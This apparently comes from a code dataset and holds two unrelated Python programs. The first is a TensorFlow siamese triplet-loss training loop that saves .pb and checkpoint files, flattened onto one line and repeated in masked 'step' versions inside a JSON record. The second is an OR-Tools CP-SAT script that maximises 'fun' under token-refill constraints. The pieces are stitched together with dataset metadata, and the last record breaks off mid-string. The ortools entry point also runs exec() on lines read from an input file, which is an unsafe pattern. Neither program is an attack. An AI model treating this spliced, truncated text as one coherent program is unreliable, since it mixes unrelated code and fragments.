cur_epoch_iters_num = train_images_num // batch_size for iters_num in range(cur_epoch_iters_num): train_anchor, train_similar, train_dissimilar,train_labels = \ train_dataset.next_triplet_batch() test_anchor, test_similar, test_dissimilar,test_labels = \ test_dataset.next_triplet_batch() if train_anchor is None or test_anchor is None: continue train_dict = {anchor_placeholder: train_anchor, similar_placeholder: train_similar, dissimilar_placeholder: train_dissimilar, labels_placeholder:train_labels, is_training_placeholder:True} test_dict = {anchor_placeholder: test_anchor, similar_placeholder: test_similar, dissimilar_placeholder: test_dissimilar, labels_placeholder:test_labels, is_training_placeholder: False} _,_global_step=sess.run([train_step,global_step], feed_dict=train_dict) anchor_out,similar_out,dissimilar_out = sess.run([ flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar], feed_dict=train_dict) _train_loss,_train_pos_dist,_train_neg_dist = \ sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict) _test_loss,_test_pos_dist,_test_neg_dist =\ sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict) print("distance:",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5]) one_moving_meaning_show = "No mean or variance" if len(bn_moving_vars) > 0: one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name) one_moving_meaning_show = "{}={}".\ format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval())) print(one_moving_meaning_show) show_text = "epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}".format \ (epoch_num, iters_num + 1, _global_step, _train_loss, "0.99", _test_loss) print(show_text) if _global_step % snapshot == 0: # 保存PB constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, ["flatten_anchor"]) save_model_name=model_name + "-" + str(_global_step) + ".pb" with tf.gfile.FastGFile(pb_path + save_model_name, mode="wb") as fw: fw.write(constant_graph.SerializeToString()) # 保存CKPT ckpt_saver.save(sess, ckpt_path + model_name + ".ckpt", global_step=total_iters_num) print("Successfully saved model {}".format(save_model_name))
normal
{ "blob_id": "97bbb181cbc0f5bfbf0b2298133fc226b6217d91", "index": 399, "step-1": "<mask token>\n", "step-2": "<mask token>\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n<mask token>\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, 
flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n", "step-3": "<mask token>\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n 
global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n", "step-4": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 
'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, 
similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n", "step-5": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\n\nbatch_size=64\ninput_height=32\ninput_width=32\ntotal_epoch_num=50\nsnapshot=100\nsupport_image_extensions=[\".jpg\",\".png\",\".jpeg\",\".bmp\"]\nmargin=1.0\nchannals=3\n\ntrain_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/train\"\ntest_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/test\"\n\nmodel_path=\"models/\"\npb_path=os.path.join(model_path,\"pb/\")\nckpt_path=os.path.join(model_path,\"ckpt/\")\n\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name=\"siamese_triplet_28out_allloss_bn\"\n\nif __name__ == '__main__':\n # image_paths,labels=get_images_path(test_image_root)\n # data=next_batch(True,None,image_paths,labels)\n # for left,right,label in zip(*data):\n # cv2.imshow(\"left\",left)\n # cv2.imshow(\"right\", right)\n # print(label)\n # cv2.waitKey(0)\n\n first_shape=None\n anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name=\"anchor\")\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"similar\")\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"dissimilar\")\n labels_placeholder = tf.placeholder(tf.float32, shape=\n [None if first_shape is None else first_shape * 3, ], name=\"labels\")\n is_training_placeholder = tf.placeholder_with_default(False, shape=(), name=\"is_training\")\n siamese_net=siameseNet.siameseNet()\n\n anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder)\n loss,pos_dist,neg_dist = 
siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin)\n\n flatten_out_anchor = tf.identity(anchor, name=\"flatten_anchor\")\n flatten_out_similar = tf.identity(similar, name=\"flatten_similar\")\n flatten_out_dissimilar = tf.identity(dissimilar, name=\"flatten_dissimilar\")\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n # learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9)\n # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)\n\n with tf.control_dependencies([tf.group(*update_ops)]):\n # train_step = optimizer.minimize(loss, global_step)\n train_step = tf.train.MomentumOptimizer(0.01, 0.90).\\\n minimize(loss, global_step=global_step)\n\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions,\n input_height,input_width,channals)\n\n test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions,\n input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # if os.path.exists(os.path.join(ckpt_path, \"checkpoint\")):\n # ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))\n\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n\n train_anchor, train_similar, train_dissimilar,train_labels = \\\n train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar,test_labels = \\\n test_dataset.next_triplet_batch()\n\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:train_labels,\n is_training_placeholder:True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:test_labels,\n is_training_placeholder: False}\n _,_global_step=sess.run([train_step,global_step], feed_dict=train_dict)\n\n anchor_out,similar_out,dissimilar_out = sess.run([\n flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar],\n feed_dict=train_dict)\n\n _train_loss,_train_pos_dist,_train_neg_dist = \\\n sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict)\n _test_loss,_test_pos_dist,_test_neg_dist =\\\n sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict)\n\n print(\"distance:\",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = \"No mean or variance\"\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name)\n one_moving_meaning_show = \"{}={}\".\\\n format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval()))\n\n print(one_moving_meaning_show)\n show_text = \"epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}\".format \\\n (epoch_num, iters_num + 1, _global_step, _train_loss, \"0.99\", _test_loss)\n print(show_text)\n\n if _global_step % snapshot == 0:\n # 保存PB\n 
constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, [\"flatten_anchor\"])\n save_model_name=model_name + \"-\" + str(_global_step) + \".pb\"\n with tf.gfile.FastGFile(pb_path + save_model_name, mode=\"wb\") as fw:\n fw.write(constant_graph.SerializeToString())\n # 保存CKPT\n ckpt_saver.save(sess, ckpt_path + model_name + \".ckpt\", global_step=total_iters_num)\n print(\"Successfully saved model {}\".format(save_model_name))\n\n\n\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from ortools.sat.python import cp_model
import os
import math
import csv
import sys

def ortoolsSolverReduceVar(num, cap, refill, fun, goal):
    model = cp_model.CpModel()
    token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i)
             for i in range(1, num + 1)]
    play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i)
            for i in range(1, num + 1)]
    compare = [model.NewBoolVar('c%i' % i)
               for i in range(1, num + 1)]
    total_fun = sum([fun[i] * play[i] for i in range(num)])
    model.Add(total_fun >= goal)
    model.Add(token[0] == cap)
    for i in range(num):
        model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])
        model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not())
        model.Add(play[i] >= 1)
        model.Add(play[i] <= token[i])
    for i in range(1, num):
        model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])
        model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not())
    model.Maximize(total_fun)
    solver = cp_model.CpSolver()
    status = solver.Solve(model)
    sat = solver.StatusName()
    time = solver.UserTime()
    if status == cp_model.INFEASIBLE:
        token = None
        play = None
        total_fun = None
    else:
        token = [solver.Value(token[i]) for i in range(num)]
        play = [solver.Value(play[i]) for i in range(num)]
        total_fun = solver.Value(total_fun)
    return [sat, token, play, total_fun, time]

def ortoolsSolverRange(num, cap, refill, fun, goal):
    model = cp_model.CpModel()
    token = [model.NewIntVar(1, cap, 't%i' % i)
             for i in range(1, num + 1)]
    play = [model.NewIntVar(1, cap, 'q%i' % i)
            for i in range(1, num + 1)]
    compare = [model.NewBoolVar('c%i' % i)
               for i in range(1, num + 1)]
    total_fun = model.NewIntVar(-100, 1000, 'total_fun')
    model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)]))
    model.Add(total_fun >= goal)
    model.Add(token[0] == cap)
    for i in range(num):
        model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])
        model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not())
        model.Add(play[i] >= 1)
        model.Add(play[i] <= token[i])
    for i in range(1, num):
        model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])
        model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not())
    model.Maximize(total_fun)
    solver = cp_model.CpSolver()
    status = solver.Solve(model)
    sat = solver.StatusName()
    time = solver.UserTime()
    if status == cp_model.INFEASIBLE:
        token = None
        play = None
        total_fun = None
    else:
        token = [solver.Value(token[i]) for i in range(num)]
        play = [solver.Value(play[i]) for i in range(num)]
        total_fun = solver.Value(total_fun)
    return [sat, token, play, total_fun, time]


def ortoolsSolverNeg(num, cap, refill, fun, goal):
    model = cp_model.CpModel()
    token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i)
             for i in range(1, num + 1)]
    play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i)
            for i in range(1, num + 1)]
    compare = [model.NewBoolVar('c%i' % i)
               for i in range(1, num + 1)]
    neg = [model.NewBoolVar('n%i' % i)
           for i in range(1, num + 1)]
    total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')
    model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)]))
    model.Add(total_fun >= goal)
    model.Add(token[0] == cap)
    for i in range(num):
        model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])
        model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not())
        model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])
        model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())
        model.Add(play[i] <= token[i])
        model.Add(play[i] == 1).OnlyEnforceIf(neg[i])
        model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())
    for i in range(1, num):
        model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])
        model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not())
    model.Maximize(total_fun)
    solver = cp_model.CpSolver()
    status = solver.Solve(model)
    sat = solver.StatusName()
    time = solver.UserTime()
    if status == cp_model.INFEASIBLE:
        token = None
        play = None
        total_fun = None
    else:
        token = [solver.Value(token[i]) for i in range(num)]
        play = [solver.Value(play[i]) for i in range(num)]
        total_fun = solver.Value(total_fun)
    return [sat, token, play, total_fun, time]

def ortoolsSolverComb(num, cap, refill, fun, goal):
    model = cp_model.CpModel()
    token = [model.NewIntVar(1, cap, 't%i' % i)
             for i in range(1, num + 1)]
    play = [model.NewIntVar(1, cap, 'q%i' % i)
            for i in range(1, num + 1)]
    compare = [model.NewBoolVar('c%i' % i)
               for i in range(1, num + 1)]
    neg = [model.NewBoolVar('n%i' % i)
           for i in range(1, num + 1)]
    total_fun = sum([fun[i] * play[i] for i in range(num)])
    model.Add(total_fun >= goal)
    model.Add(token[0] == cap)
    for i in range(num):
        model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])
        model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not())
        model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])
        model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())
        model.Add(play[i] <= token[i])
        model.Add(play[i] == 1).OnlyEnforceIf(neg[i])
        model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())
    for i in range(1, num):
        model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])
        model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not())
    model.Maximize(total_fun)
    solver = cp_model.CpSolver()
    status = solver.Solve(model)
    sat = solver.StatusName()
    time = solver.UserTime()
    if status == cp_model.INFEASIBLE:
        token = None
        play = None
        total_fun = None
    else:
        token = [solver.Value(token[i]) for i in range(num)]
        play = [solver.Value(play[i]) for i in range(num)]
        total_fun = solver.Value(total_fun)
    return [sat, token, play, total_fun, time]

if __name__ == '__main__':
    file = sys.argv[1]
    f = open(file)
    for i in range(5):
        exec(f.readline())
    f.close()
    [sat, token, play, total_fun, time] = ortoolsSolverComb(
        num, cap, refill, fun, goal)
    print('Status:', sat)
    if sat == 'OPTIMAL':
        print('Maximum total fun:', total_fun)
normal
{ "blob_id": "da98835e48a759cbe7bd29ddba1fac20c006827d", "index": 4996, "step-1": "<mask token>\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 